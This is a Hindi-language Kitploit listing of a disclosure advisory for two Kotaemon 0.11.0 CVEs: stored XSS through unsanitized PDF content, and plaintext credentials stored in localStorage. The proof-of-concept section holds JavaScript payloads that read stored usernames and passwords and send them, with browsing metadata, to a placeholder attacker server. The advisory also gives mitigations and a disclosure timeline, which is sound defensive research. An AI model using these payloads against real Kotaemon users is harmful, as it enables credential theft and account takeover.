Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Kotaemon-CVE-2025-56526-56527-disclosure — CVE-2025-56526 और CVE-2025-56527 के लिए सार्वजनिक प्रकटीकरण — Kotaemon 0.11.0 में अनसैनिटाइज़्ड PDF सामग्री रेंडरिंग के माध्यम से स्टोर्ड XSS और प्लेनटेक्स्ट क्रेडेंशियल एक्सपोज़र। पूर्ण तकनीकी विश्लेषण, PoC, प्रभाव मूल्यांकन और जिम्मेदार प्रकटीकरण समयरेखा शामिल है। | Kitploit
उपकरण/GitHubGitHub/hantul/kotaemon-cve-2025-56526-56527-disclosure
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
hantul/kotaemon-cve-2025-56526-56527-disclosure

Kotaemon-CVE-2025-56526-56527-disclosure

CVE-2025-56526 और CVE-2025-56527 के लिए सार्वजनिक प्रकटीकरण — Kotaemon 0.11.0 में अनसैनिटाइज़्ड PDF सामग्री रेंडरिंग के माध्यम से स्टोर्ड XSS और प्लेनटेक्स्ट क्रेडेंशियल एक्सपोज़र। पूर्ण तकनीकी विश्लेषण, PoC, प्रभाव मूल्यांकन और जिम्मेदार प्रकटीकरण समयरेखा शामिल है।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

Kotaemon CVE-2025-56526 और CVE-2025-56527 सार्वजनिक खुलासा

Kotaemon सूचना पैनल में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग, localStorage में प्लेनटेक्स्ट क्रेडेंशियल भंडारण के साथ मिलकर, एक ही दुर्भावनापूर्ण PDF अपलोड से पूर्ण सत्र समझौता करने में सक्षम बनाती है।

कार्यकारी सारांश

  • प्रभावित उत्पाद / संस्करण: Kotaemon <= 0.11.0 (कमिट 37cdc28 सहित)
  • कमजोरियाँ:
    • CVE-2025-56526 – अस्वच्छित PDF सामग्री रेंडरिंग के माध्यम से संग्रहीत XSS
    • CVE-2025-56527 – localStorage में प्लेनटेक्स्ट उपयोगकर्ता नाम/पासवर्ड भंडारण
  • आवश्यक विशेषाधिकार: दस्तावेज़ अपलोड अनुमतियों वाला प्रमाणित उपयोगकर्ता
  • प्रभाव: क्रेडेंशियल चोरी, लगातार सत्र अपहरण, LLM आउटपुट की UI विकृति, आगे चलकर उपयोगकर्ता विश्वास का समझौता

CVE अवलोकन

CVE IDकमजोरीCWEप्राथमिक प्रभाव
CVE-2025-56526PDF-व्युत्पन्न HTML के माध्यम से संग्रहीत XSSCWE-79मनमाना JavaScript निष्पादन, डेटा बहिर्गमन
CVE-2025-56527प्लेनटेक्स्ट क्रेडेंशियल भंडारणCWE-922क्रेडेंशियल प्रकटीकरण, सत्र अपहरण

तकनीकी विश्लेषण

1. अस्वच्छित PDF सामग्री रेंडरिंग (संग्रहीत XSS)

PDF निष्कर्षण परिणाम (पाठ, तालिका मार्कअप, छवि मेटाडेटा) बिना एस्केप किए DOM में इंजेक्ट किए जाते हैं। इसलिए एक दुर्भावनापूर्ण PDF मनमाना HTML/JS ले जा सकती है, जो जब भी सूचना पैनल या तर्क दृश्य retrieved_content रेंडर करते हैं, चलता है।

प्रभावित कोड पथों में शामिल हैं:

  • libs/ktem/ktem/utils/render.py (Render.table, Render.image, Render.collapsible_with_header)
  • libs/ktem/ktem/index/file/ui.py (table / image रेंडरिंग)
  • libs/ktem/ktem/reasoning/simple.py और libs/ktem/ktem/reasoning/react.py
  • libs/kotaemon/kotaemon/indices/qa/format_context.py

2. localStorage में प्लेनटेक्स्ट क्रेडेंशियल भंडारण

libs/ktem/ktem/pages/login.py libs/ktem/ktem/assets/js/main.js के साथ मिलकर कच्चे क्रेडेंशियल्स को सीधे localStorage में संग्रहीत और पुनर्प्राप्त करता है:

root@kitploit:~
setStorage('username', usn);
setStorage('password', pwd);
const username = getStorage('username', '');
const password = getStorage('password', '');

XSS वेक्टर के माध्यम से निष्पादित कोई भी JavaScript इन मानों को तुरंत पढ़ सकता है, जिसके परिणामस्वरूप विश्वसनीय क्रेडेंशियल चोरी और दीर्घकालिक खाता अधिग्रहण होता है।

अवधारणा का प्रमाण

  1. नीचे दिए गए पेलोड को PDF में एम्बेड करें (उदाहरण के लिए, किसी छवि की alt विशेषता या टेक्स्ट ऑब्जेक्ट के अंदर):
root@kitploit:~
 {
  const u = localStorage.getItem('username');
  const p = localStorage.getItem('password');
  if (u && p) {
    new Image().src='https://[ATTACKER-SERVER]?d=' + btoa(`id=${u}&pw=${p}`);
  }
})();
">
  1. PDF अपलोड करें और इसे Kotaemon के सूचना पैनल के अंदर खोलें। एम्बेडेड स्क्रिप्ट एप्लिकेशन ओरिजिन के अंदर चलती है और क्रेडेंशियल्स को बाहर भेजती है।
  2. एक उन्नत पेलोड अतिरिक्त रूप से लक्ष्यीकरण में सहायता के लिए ब्राउज़िंग संदर्भ चुराता है:
root@kitploit:~
 {
  const payload = btoa(
    `id=${localStorage.getItem('username')}` +
    `&pw=${localStorage.getItem('password')}` +
    `&url=${location.href}&origin=${location.origin}` +
    `&ua=${navigator.userAgent}`
  );
  new Image().src='https://[ATTACKER-SERVER]?d=' + payload;
})();
">

प्रभाव

  • संग्रहीत XSS: दुर्भावनापूर्ण PDF को देखते ही मनमाना JavaScript चलता है।
  • क्रेडेंशियल चोरी: प्लेनटेक्स्ट username/password जोड़े किसी भी इंजेक्टेड स्क्रिप्ट के सामने उजागर हो जाते हैं।
  • लगातार सत्र अपहरण: हमलावर उपयोगकर्ताओं का रूप धारण करने, प्रोजेक्ट्स तक पहुंचने, या LLM आउटपुट को विषाक्त करने के लिए क्रेडेंशियल्स का पुन: उपयोग कर सकते हैं।
  • LLM आउटपुट अखंडता हानि: उपयोगकर्ता अब सूचना पैनल या तर्क परिणामों पर भरोसा नहीं कर सकते, जिससे परिष्कृत सामाजिक इंजीनियरिंग श्रृंखलाएं सक्षम होती हैं।

विस्तारित खतरा विश्लेषण

Kotaemon अक्सर स्थानीय या उद्यम वातावरण में तैनात किया जाता है जहां उपयोगकर्ता संवेदनशील आंतरिक दस्तावेज़ अपलोड करते हैं। चूंकि PDF-व्युत्पन्न सामग्री बिना स्वच्छीकरण के DOM में डाली जाती है, एक हमलावर सामान्य दिखने वाले व्यावसायिक दस्तावेज़ के अंदर दुर्भावनापूर्ण पेलोड छिपा सकता है।

जब पीड़ित इस दस्तावेज़ को अपलोड करता है और देखता है, तो छिपा हुआ JavaScript स्वचालित रूप से निष्पादित होता है, localStorage से क्रेडेंशियल्स चुराता है और निजी चैट लॉग तथा दस्तावेज़ सामग्री को उजागर करता है।

यद्यपि ट्रिगर उपयोगकर्ता-आरंभित प्रतीत होता है, यह self-XSS नहीं है। मूल कारण अपलोड की गई फ़ाइलों से निकाले गए HTML को स्वच्छ करने में सर्वर-पक्षीय विफलता है, जो विश्वसनीय UI घटकों के अंदर संग्रहीत XSS को सक्षम बनाती है।

परिणामस्वरूप, यथार्थवादी सामाजिक इंजीनियरिंग परिदृश्यों में एक एकल दुर्भावनापूर्ण PDF पूर्ण खाता समझौते का कारण बन सकती है।

अनुशंसाएँ

  1. रेंडरिंग से पहले सभी PDF-व्युत्पन्न सामग्री को एस्केप या स्वच्छ करें (उदाहरण के लिए, html.escape, DOMPurify, या DOM सिंक के लिए Trusted Types)।
  2. Markdown/HTML व्हाइटलिस्ट पाइपलाइन लागू करें ताकि केवल स्वीकृत टैग/विशेषताएँ ब्राउज़र तक पहुँचें।
  3. कच्चे क्रेडेंशियल्स के क्लाइंट-पक्षीय भंडारण को प्रतिबंधित करें; इसके बजाय HTTP-only सुरक्षित कुकीज़ या अल्पकालिक सत्र टोकन का उपयोग करें।
  4. DOM XSS हमले की सतह को कम करने के लिए CSP (script-src 'self') और Trusted Types तैनात करें।
  5. PDF अंतर्ग्रहण पथों के लिए प्रतिगमन परीक्षण जोड़ें और एक LLM आउटपुट-हैंडलिंग नीति परिभाषित करें जो पुनर्प्राप्त सामग्री को अविश्वसनीय मानती है।

साक्ष्य (screenshots/)

  • सूचना पैनल के अंदर रेंडर की गई दुर्भावनापूर्ण PDF
  • निकाली गई सामग्री के माध्यम से इंजेक्ट किया गया HTML पेलोड
  • अस्वच्छित DOM नोड्स दिखाने वाले डेवलपर उपकरण
  • localStorage में संग्रहीत प्लेनटेक्स्ट क्रेडेंशियल्स
  • पेलोड द्वारा जारी नेटवर्क बहिर्गमन अनुरोध
  • हमलावर सर्वर को base64-एन्कोडेड क्रेडेंशियल्स प्राप्त हो रहे हैं
  • URL/origin/UA मेटाडेटा एकत्र करने वाला उन्नत पेलोड
  • परिणामी हमलावर-नियंत्रित सत्र/UI

खुलासा वक्तव्य

यह सार्वजनिक परामर्श उद्योग-मानक जिम्मेदार खुलासा प्रथाओं का पालन करता है:

  • विक्रेता को जवाब देने और पैच करने के लिए 90 दिनों से अधिक का समय दिया गया था।
  • कोई समाधान या सुधार योजना प्रदान किए बिना कई अनुवर्ती प्रयास किए गए।
  • CVE पहचानकर्ता (CVE-2025-56526, CVE-2025-56527) आधिकारिक रूप से MITRE द्वारा निर्धारित किए गए थे।
  • सार्वजनिक खुलासे से 30 दिन पहले एक अंतिम सूचना भेजी गई थी।
  • सार्वजनिक खुलासा अब अंतिम उपयोगकर्ताओं की सुरक्षा और बिना पैच वाले जोखिमों के संपर्क को कम करने के लिए आगे बढ़ता है।

उपयोगकर्ताओं के लिए अनुशंसाएँ

Kotaemon (<= 0.11.0) के उपयोगकर्ताओं को सुरक्षा सुधार उपलब्ध होने तक निम्नलिखित पर विचार करना चाहिए:

  • आगामी सुरक्षा पैच के लिए आधिकारिक रिपॉजिटरी की निगरानी करें।
  • अविश्वसनीय दस्तावेज़ों को संसाधित करने से बचें।

खुलासा समयरेखा

  • 2025-07-14: Kotaemon टीम को प्रारंभिक कमजोरी रिपोर्ट प्रस्तुत की गई।
  • 2025-08-12: पहला अनुवर्ती; विक्रेता ने व्यस्त होना स्वीकार किया और समय सीमा का अनुरोध किया।
  • 2025-09-12: विस्तृत रिपोर्ट और PoC के साथ दूसरा अनुवर्ती।
  • 2025-09-13: अंतिम अनुवर्ती; कोई और प्रतिक्रिया नहीं।
  • 2025-10-14: सार्वजनिक रूप से खुलासा करने के इरादे का संकेत देते हुए अंतिम सूचना भेजी गई।
  • 2025-11-14: CVE-2025-56526 और CVE-2025-56527 का सार्वजनिक खुलासा।

श्रेय और संपर्क

  • यह रिपोर्ट HanTul द्वारा तैयार की गई थी। (पूर्व में Team 404 Not Found 퇴근, WhiteHat School तीसरे बैच (WHS3), दक्षिण कोरिया के सदस्य)।
  • संपर्क: [email protected]
  • GitHub: @HanTul
टूल डाउनलोड करें